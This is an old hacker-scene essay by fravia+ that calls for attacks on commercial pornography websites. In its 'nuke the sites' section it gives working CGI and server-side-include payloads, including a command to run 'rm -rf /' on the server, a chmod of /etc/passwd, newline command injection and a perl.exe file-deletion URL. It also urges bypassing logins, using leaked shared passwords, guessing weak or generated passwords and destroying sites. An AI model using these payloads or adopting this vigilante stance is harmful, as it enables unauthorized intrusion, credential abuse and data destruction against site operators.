Crackers against Smut Why should we fight
against Smut sites? Are we censors?
~
(A general approach to smut site bombing)
~
By fravia+, Updated May 1998
~
Why should we fight against Smut sites? Are we censors?
We are not censors, and we have nothing whatsoever against nude images (if
given away for free), yet we have to wage battle against commercial smut sites
for many pretty sound reasons. Here the main ones:
Because commercial smut sites are swamping the whole Web. They have swamped, for
instance, the server where my main page was hosted to a point that made impossible
for me to remain there. This swamping may seem strange, since there is NO REASON
whatsoever to use or peruse such commercial smut sites.
As anyone that visit these pages of mine knows, if you have learned how to search
the web there is NOTHING... absolutely nothing that you will not find on the web.
Any application you can think of, any image that has ever been taken or made, any
BOOK that has been written dwells somewhere inside a server on our planet, ready
to be downloaded by you for free.
In such a situation selling "commercially" what is already free is only a
fraud, where 'copyrights' laws are used as fig leaves to cover strong commercial
interests, where all tricks are displayed to deny knowledge for the poors and
the simple ones, all frills and 'push' activities are fostered heavily in order
to keep under their consumistic chains and whips those still unaware of what's
going on, gullible believers in a society where money -and not knowledge- means
power (why?).
Yet this nether world of ours shows a NEW reality: inter alia you can get at, and
download, all the knowledge (and horrors) of the human race. That is, you can, once
you have found them.
The problem and the difficulty is to understand where exactly -and under which
name that what you seek has been stored.
This is fairly easy endeavour, though, (see my 
search engines and my
how to search pages), yet many poor suckers
and lusers simply don't know it, and have -for instance- to pay in order to
get their daily smut ration... don't laugh at them! Imagine you are a frustrated
young man, somewhere in Saudi Arabia, with a web access and enough money and yet
no naked women images (nor many naked real women nor Wodka-Martinis for that matter :-)
nowhere in a range of 1000 kilometers... you would probably fall for it as well...
Since, as you know, on the Web there is NO law, crackers are among the few that can
try to put an end to any activity that they don't like. We decide alone what we allow
and what we forbid, since we HAVE (and spread) real knowledge... the only real "power"
in our worlds of bytes and codes, where commercial minds stamp about blinded by
money... and where we can destroy them, and stamp them out, as I will teach you.
You'll begin to see here how we can attack, and you may decide to join and help (or
even criticize and help... you are not compelled to agree with our course of action,
of course).
The proliferation of these commercial sites is independent of their (mostly poor)
contents, independent from the fact that they are offering images that you could
have for free, since the people that fall for it DO NOT KNOW that, independent
from all moralisation campaigns that, as usual in this awful society, always stop
short of attacking the "holy" commercial activities...
this swamping is simply a consequence of the inner working of these sites,
which you must understand in order to defeat them, and that I will try to summarize
here:
Let's see how a "classical" commercial smut works:
THE WORKING OF A CLASSICAL COMMERCIAL SMUT SITE
1) You steal a great number of bad scanned smut images from the newsgroups (where
anybody could get them for free, of course, but that's not the point for you).
2) You get an Internic name like xxxsmuttfickxxx.com for 100 US dollars (you are
already a server provider yourself, or you find one for next to nothing)
3) You buy some bad-written cgi-scripts to get a paied access to your smut offerings.
4) You realise that almost nobody comes
5) You spam every usenet group you can get your hands on in order to get some
idiot to visit your site paying you some money
6) You realise that almost nobody comes
7) You prepare a real ugly smut image as "banner-ad" and exchange it with one
hundred other smut sites, hoping that the small park of frustrated rich idiots
that roam these sites (and pay for them) will give you some dollars too.
8) You realise that almost nobody comes
9) You specialise in nastier and nastier smut images ("lolitas swallowing horses"
"pregnant teenagers tortured by lorry drivers" or whatever)
10) You swamp whole servers with the same poor images yet with twenty differently
named "entrances" to them.
11) You spam and spam and spam and swamp and swamp and swamp
12) You realise that most people that seek this kind of images still prefer to get
them for free
13) You write the word "free" everywhere in your commercial smut site hoping to
get somehow inside the search engines listings for free smut images.
14) You eventually scrap your couple of bucks from your dirty floor and swallow them.
WHAT CAN WE DO AGAINST THEM?
Well, there are some possible line of actions (I hope you'll send me more
ideas on this):
1) Nuke the sites
This is far from easy, and you need some particulat conditions to
be able to do it, yet it is great fun. You'll get some hints and
some simple tricks on my cgi reverse engineering pages one and two.
Basically you just write something like
#exec cmd="chmod 666 /etc/passwd"
for SSI servers
or add something like the following to the http://www.yoursmuttarget.com
com/cgi-bin/test-cgi?*
com/cgi-bin/nph-test-cgi?/*
com/cgi-bin/nph-test-cgi?etc/*
or add to your target URL
%0a/bin/ls%20-la%20/usr/src/include
or submit a tag like the following one:
<!--#exec cmd="/bin/rm -rf /"-->
or if the perl.executable is there run it with this URL:
http://hostname/cgi-bin/perl.exe?-e+unlink+%3C*.*%3E%3B
and nuke the smut site for a while :-)
And all this is just to SEE if you can play a little with them (a real
"complete" attack is of course a little more complicated).
VISIT MY cgi reverse engineering PAGE ONE
VISIT MY cgi reverse engineering PAGE TWO
2) Find and explore the sites
You can easily explore these sites 'jumping' over their password verification
applets or scripts.
1) Download applets or scripts
2) Crack them
3) Enter
4) Find a weak point
5) destroy
These 'alien site exploring' techniques will be explained in december on this
page.
To find:
VISIT MY how to comb smut sites PAGE
VISIT MY combing and klebing techniques PAGE
To explore:
VISIT MY alien site exploring page (RESTRICTED ACCESS)
Don't forget that you can enter through FALSE passwords. There are in the warez
scene hundred of sites that offer 'capered' passwords for commercial smut sites.
One of the rare case where I'm fully favourable to the warez kids. Million of
frustrated smut-seekers use these free passwords in order to gain access to the
smut sites WITHOUT paying them. This is IMO very good because this does not only
damage the smut sites... in fact most of these simpletons realise in this way very
soon, how bogus all these commercial smut sites are and won't in their life never
come to the idea of paying for access again.
The Commercial smut sites react against password capering with automated scripts that
deconnect all accounts used by two persons on the same time. Yet web server-user
notifications protocols are so unreliable that most of the time they just don't dare
doing it really, and simply use a completely useless warning, because there are
much too many dynamic IDs, and their real terror is to scare off one of the few
gullible correct users they have got. So if you get a scarecrow message visiting
with a capered password, just reload once more until it disappears.
You can also of enter using gathered 'crumbs' that you'll find on the source
html script of the page. Useful crumb gathering is also possible through right
clicking on any logo or image and carefully watching and registering the URL
call sequence inside your "location" browser's window.
VISIT MY source checking PAGE
3) Study the friends of your enemies
Many commercial smut sites resort to 'commercial smut verificators', which pay them
'per visit' and take care of the whole verification routines. While this offers a
better security on one site (the cgi-scripts protections are tougher), this means
also that once you have cracked one of these schemes you have cracked all of them.
My best attack (until now) could bust one of these verification schemes for two
complete days. The suckers that paid for it left it in droves and it never regained
its momentum.
I will teach you the weaknesses of these commercial verification schemes.
VISIT MY commercial smut verificators page (RESTRICTED ACCESS)
4) Beat them at their own game: demonstrate that they are utterly useless
There is practically not a single image on the commercial smut sides that
you could not have for free if you cared to. Yet, instead of leaving these
images where only determined people could find them (and why not, if they
want to see them, please go ahead), the commercial smut sites throw all
these images everywhere on the web, making it dead easy, even for childrens,
to get at them even if they ARE NOT really seeking them (and since I have
three kids, I know what I am saying... if you want to have a look for yourself
at what kind of smut you can get without any filter whatsoever, connect for
instance to http://www.bondage.com).
This is a consequence of the awful society where we live, and where everything
is measured only through its 'commercial' value, even people and bodies, yet
there is no reason for us to accept this. Since nuking the commercial smut
sites is great fun but does not seem to bring us nowhere (there are simply
too many of them), I am considering writing simple robots that "dig out" for
free all smut images and publish (and update) these links automatically on
the usenet relevant groups where the suckers that PAY the commercial smut
sites roam. This should damage all commercial smut sites where it really
hurts: on their commercial site :-)
So a good counter-offensive could be to publish on the relevant usenet
groups (say once every week, automatically):
1) either a list of all password capering sites;
2) or a list of all the many really free smut sites (which exist but
are fairly difficult to find due to the fraudulent proliferation of
the adjective 'free' inside the commercial smut sites);
3) or a list of all the hidden links inside the main smut sites;
4) or some cracking tutorials for the PASSWORD ASKING AND CHECKING applets;
5) or some easy robots that would allow any luser to gather whatever
images he (thinks he) needs.
I believe that sending all these info to every warez sites (which are all
concurring against another -for bucks- as well, and would tehrefore immediatly
publish everything you feed them, just in order to gain some more hits :-) would
inflict a more lasting damage to the whole commercial smut scene.
Since the commercial smut sites cannot afford to change continuously the
whole subdirectory naming structure, the publishing of the hidden links and
subdirectories structure could be even more effective that the simple publishing
of the passwords or the occasional nuking of a couple of exposed site.
We will examine (in december) how exactly a userid/password script works, and
how it 'decides' if the user should gain access to the site or not. There
are now some new censorship applications that check THE (rosa) PIXELS of the
images in order to allow or forbid to 'corporate prisoners' to see them (see
my corporate survival page in order to defeat them).
We will therefore reverse their algorithms in order to
FIND where the images have been hidden inside any smut server. Such a little
robot application can then be given around for free... smut seekers will get
for free their smut-dope automagically brought home and commercial smut sites
will fail miserably as they deserve... hey! this can be very useful against
commercial advertisement sites as well, come to think of it :-)
Another very interesting new sector is PASSWORD CAPERING. Let's have a closer
look at the passwords and userids used by the commercial sites (not only smut
sites btw). You'll soon realise that they are divided in TWO main categories:
user-chosen and automatically generated.
Both are very weak, as we know:
user chosen passwords are repetitive:
fred/fred (look at the letters "fred" on your keyboard)
1111/1111
1234/1234
pamela/pamela
userid/password (ofter that you would think)
That's the reason some commercial site 'assign' you a password:
REDD12JH31/444JAH12@1
99981-2312/RRAE112-43
And as all crackers know, there is nothing easier than crack the algorithms
that assign valid passwords in this way once you download the applets or, even
more simply, have just a (cracker :-) look at a dozen valid passwords taken from
the many password warez sites.
VISIT MY password busting page (RESTRICTED ACCESS)
Please send me your hints and contributions for this section.
MAny pages, as you have seen are 'restricted access'
because I'm fed up with people just leeching and never contributing to my site.
As you'll be able to see on my new bot wars page, I have
decided to put part of the advanced knowledge in some restricted areas
of my site, you'll be able to find quite a lot in the public part, but if
you want more advanced stuff you'll have to contribute with your own
knowledge.
It is clear that this project will only survive and thrive if there will be
more and more essays from ALL OF YOU and if you will find and send me other
-even better- tricks in order to commercial ruin (or at least to seriously annoy)
all those bastards that run the commercial smut sites.
We have done a lot already (see the October attack story), yet we have
a lot more to do in order to clean the web from commercial bastards... and not only
regarding smut images...
Some lusers believe that money and sex are the two only things that count in life, and
that 'combining' the two, they have found an easy way to scrap some easy bucks. Let's
show them that in our world money does not mean anything at all and that even if sex
would really have something to do with some poor quality smut photographical images,
which I doubt, that too can be gathered on the web for free, like everything else.
I hope you understand now WHY I want to bust commercial sites (apart from the 'intrinsecal'
fun in busting web sites :-) and WHY this has nothing to do with any censorship attitude of
mine: I am a cracker: I want a free web for all.
(c) fravia+ May 1997
Good luck, good hunt!
And if you are interested, here is a small e-mail exchange of
your +truly with a smut site (polite) owner.
And if you are interested, here is a very simple password
busting program
Crackers against Smut Antismut main page
combing i.e. how
to find the "commercial smut" sites
source checking
i.e. how to exploit their intrinsic weaknesses
cgi-script one
CGI-tricks, page one
cgi-script two
CGI-tricks, page two
Back to Fravia's main site
homepage links anonymity +ORC javascript wars academy database
bots' wars tools cocktails antismut CGI-scripts search forms mail fravia+
Is reverse engineering legal?